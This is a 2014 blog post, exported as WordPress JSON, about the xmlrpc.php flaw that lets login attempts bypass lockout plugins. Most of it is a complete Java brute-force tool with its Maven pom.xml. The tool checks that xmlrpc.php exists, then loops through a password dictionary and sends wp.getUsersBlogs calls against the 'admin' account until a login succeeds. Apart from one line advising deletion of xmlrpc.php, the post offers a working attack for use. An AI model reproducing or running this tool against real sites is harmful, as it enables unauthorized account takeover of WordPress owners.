{"id":952,"date":"2014-08-02T17:42:57","date_gmt":"2014-08-02T09:42:57","guid":{"rendered":"http:\/\/www.yeetrack.com\/?p=952"},"modified":"2014-08-02T17:42:57","modified_gmt":"2014-08-02T09:42:57","slug":"wordpress-xmlrpc-php%e6%9a%b4%e5%8a%9b%e7%a0%b4%e8%a7%a3%e6%bc%8f%e6%b4%9e","status":"publish","type":"post","link":"https:\/\/www.yeetrack.com\/?p=952","title":{"rendered":"WordPress xmlrpc.php brute-force vulnerability"},"content":{"rendered":"<p>WordPress is a very popular open-source blogging platform. It provides a way to publish posts remotely through the <strong>xmlrpc.php<\/strong> file in the site root. An xmlrpc vulnerability was disclosed recently: when authentication is done through xmlrpc, even a failed attempt is not recorded by the security plugins installed in WordPress, so the lockout after N wrong passwords is never triggered. The account can therefore be brute-forced, and if the password is also weak, that is quite dangerous. The simplest fix is to delete the <strong>xmlrpc.php<\/strong> file. With some spare time on my hands, I wrote a brute-force script in Java; all it does is call <strong>xmlrpc.php<\/strong> over and over with various usernames and passwords and check the authentication result, which is very simple. It is for fun only; be careful when it comes to brute-forcing.<!--more--><\/p>\n<p>The source of <strong>Xmlrpc.java<\/strong> is as follows:<\/p>\n<pre><code>    package com.yeetrack.security.wordpress;\n\n   
 import org.apache.http.client.ClientProtocolException;\n    import org.apache.http.client.config.RequestConfig;\n    import org.apache.http.client.methods.CloseableHttpResponse;\n    import org.apache.http.client.methods.HttpGet;\n    import org.apache.http.client.methods.HttpPost;\n    import org.apache.http.entity.StringEntity;\n    import org.apache.http.impl.client.CloseableHttpClient;\n    import org.apache.http.impl.client.HttpClients;\n    import org.apache.http.util.EntityUtils;\n    import org.slf4j.Logger;\n    import org.slf4j.LoggerFactory;\n    import org.testng.annotations.Test;\n\n    import java.io.*;\n\n    \/**\n     * Created by victor wang on 2014\/8\/2.\n     * Uses the WordPress xmlrpc vulnerability to brute-force the password\n     *\/\n    public class Xmlrpc\n    {\n        private String userAgent = \"Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko\/20100101 Firefox\/31.0\";\n        RequestConfig requestConfig = RequestConfig.custom().setConnectionRequestTimeout(4000).setConnectTimeout(4000)\n                .setSocketTimeout(4000).build();\n        private static Logger logger = LoggerFactory.getLogger(Xmlrpc.class);\n        private CloseableHttpClient httpClient = HttpClients.custom()\n                .setUserAgent(userAgent)\n                .setDefaultRequestConfig(requestConfig)\n                .build();\n\n        \/**\n         * Check whether the xmlrpc.php file exists on the domain\n         *\/\n        private boolean checkXmlRpcFile(String domain)\n        {\n            domain = wrapperUrl(domain);\n            if(domain==null)\n                return false;\n            HttpGet get = new HttpGet(\"http:\/\/\"+domain+\"\/xmlrpc.php\");\n            get.addHeader(\"User-Agent\", userAgent);\n            CloseableHttpResponse response = null;\n            String resultString = null;\n            try {\n                response = httpClient.execute(get);\n                if(null 
== response || response.equals(\"\"))\n                    return false;\n                resultString = EntityUtils.toString(response.getEntity());\n            } catch (IOException e) {\n                e.printStackTrace();\n            }\n\n            return resultString != null &amp;&amp; resultString.contains(\"XML-RPC server accepts POST requests only.\");\n        }\n\n        \/**\n         * Brute-force attempt\n         *\/\n        private boolean forceLogin(String username, String password, String url)\n        {\n            \/\/ try to log in\n            HttpPost post = new HttpPost(\"http:\/\/\"+wrapperUrl(url)+\"\/xmlrpc.php\");\n            post.addHeader(\"User-Agent\", userAgent);\n            String xmlString = \"&lt;?xml version=\\\"1.0\\\" encoding=\\\"iso-8859-1\\\"?&gt;&lt;methodCall&gt;  &lt;methodName&gt;wp.getUsersBlogs&lt;\/methodName&gt;  &lt;params&gt;   &lt;param&gt;&lt;value&gt;\"+username+\"&lt;\/value&gt;&lt;\/param&gt;   &lt;param&gt;&lt;value&gt;\"+password+\"&lt;\/value&gt;&lt;\/param&gt;  &lt;\/params&gt;&lt;\/methodCall&gt;\";\n            StringEntity entity = null;\n            try {\n                entity = new StringEntity(xmlString);\n                post.setEntity(entity);\n                CloseableHttpResponse response = httpClient.execute(post);\n                String loginResult = EntityUtils.toString(response.getEntity());\n                if(null== loginResult || loginResult.equals(\"\"))\n                    return false;\n                if(loginResult.contains(\"isAdmin\")) {\n                    logger.info(url + \"\u767b\u5f55\u6210\u529f\uff0cuserename---&gt;\" + username + \"  password---&gt;\" + password);\n                    return true;\n                }\n            } catch (UnsupportedEncodingException e) {\n                e.printStackTrace();\n            } catch (ClientProtocolException e) {\n                e.printStackTrace();\n            } catch (IOException e) {\n                e.printStackTrace();\n       
     }\n\n            return false;\n        }\n        \/**\n         * Sanitize the url: strip the leading http:\/\/ and the trailing path\n         *\/\n        private String wrapperUrl(String url)\n        {\n            if(null == url || url.equals(\"\"))\n                return null;\n            if(url.startsWith(\"http:\/\/\"))\n                url = url.substring(7);\n            if(url.contains(\"\/\"))\n                url = url.substring(0, url.indexOf(\"\/\"));\n            return url;\n        }\n\n        \/**\n         * Crack the password\n         *\/\n        @Test\n        public void test()\n        {\n            String url = \"http:\/\/somewordpress.com\/xmlrpc.php\";\n            if(!checkXmlRpcFile(url)) {\n                logger.info(url+\"---&gt;\u4e0d\u5b58\u5728xmlrpc\u6f0f\u6d1e\");\n                return;\n            }\n            File file = new File(\"src\/main\/resources\/1pass00.txt\"); \/\/ password dictionary; there are piles of these online, or you can generate your own\n\n\n            try {\n                FileReader fileReader = new FileReader(file);\n                BufferedReader bufferedReader = new BufferedReader(fileReader);\n                String line = null;\n                int count = 1;\n                while ((line = bufferedReader.readLine()) != null) {\n                    System.out.println(\"\" + count + \"  \" + line);\n                    if(forceLogin(\"admin\", line, url))\n                        break;\n                    count++;\n                    \/\/Thread.sleep(500);\n                }\n            } catch (Exception e) { e.printStackTrace(); }\n\n        }\n    }\n<\/code><\/pre>\n<p>The project is managed with Maven and uses Apache httpclient and log4j. The <strong>pom.xml<\/strong> is as follows:<\/p>\n<pre><code>    &lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n    &lt;project 
xmlns=\"http:\/\/maven.apache.org\/POM\/4.0.0\"\n             xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n             xsi:schemaLocation=\"http:\/\/maven.apache.org\/POM\/4.0.0 http:\/\/maven.apache.org\/xsd\/maven-4.0.0.xsd\"&gt;\n        &lt;modelVersion&gt;4.0.0&lt;\/modelVersion&gt;\n\n        &lt;groupId&gt;com.yeetrack.security&lt;\/groupId&gt;\n        &lt;artifactId&gt;wordpress-xmlrpc&lt;\/artifactId&gt;\n        &lt;version&gt;1.0-SNAPSHOT&lt;\/version&gt;\n\n        &lt;dependencies&gt;\n            &lt;dependency&gt;\n                &lt;groupId&gt;org.apache.httpcomponents&lt;\/groupId&gt;\n                &lt;artifactId&gt;httpclient&lt;\/artifactId&gt;\n                &lt;version&gt;4.4-alpha1&lt;\/version&gt;\n            &lt;\/dependency&gt;\n            &lt;dependency&gt;\n                &lt;groupId&gt;org.apache.httpcomponents&lt;\/groupId&gt;\n                &lt;artifactId&gt;httpmime&lt;\/artifactId&gt;\n                &lt;version&gt;4.4-alpha1&lt;\/version&gt;\n            &lt;\/dependency&gt;\n            &lt;dependency&gt;\n                &lt;groupId&gt;org.testng&lt;\/groupId&gt;\n                &lt;artifactId&gt;testng&lt;\/artifactId&gt;\n                &lt;version&gt;6.8.8&lt;\/version&gt;\n            &lt;\/dependency&gt;\n            &lt;dependency&gt;\n                &lt;groupId&gt;org.slf4j&lt;\/groupId&gt;\n                &lt;artifactId&gt;slf4j-log4j12&lt;\/artifactId&gt;\n                &lt;version&gt;1.7.7&lt;\/version&gt;\n            &lt;\/dependency&gt;\n        &lt;\/dependencies&gt;\n    
&lt;\/project&gt;<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>WordPress is a very popular open-source blogging platform. It provides a way to publish posts remotely through the xmlrpc.php file in the site root. An xmlrpc vulnerability was disclosed recently: when authentication is done through xmlrpc, even a failed attempt is not recorded by Wor&#46;&#46;&#46;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"pgc_sgb_lightbox_settings":"","footnotes":""},"categories":[35],"tags":[25,26,5,29],"class_list":["post-952","post","type-post","status-publish","format-standard","hentry","category-hacking","tag-wordpress","tag-26","tag-5","tag-29"],"views":16266,"_links":{"self":[{"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/posts\/952","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=952"}],"version-history":[{"count":1,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/posts\/952\/revisions"}],"predecessor-version":[{"id":953,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=\/wp\/v2\/posts\/952\/revisions\/953"}],"wp:attachment":[{"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=952"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=952"},{"taxonomy":"po
st_tag","embeddable":true,"href":"https:\/\/www.yeetrack.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=952"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}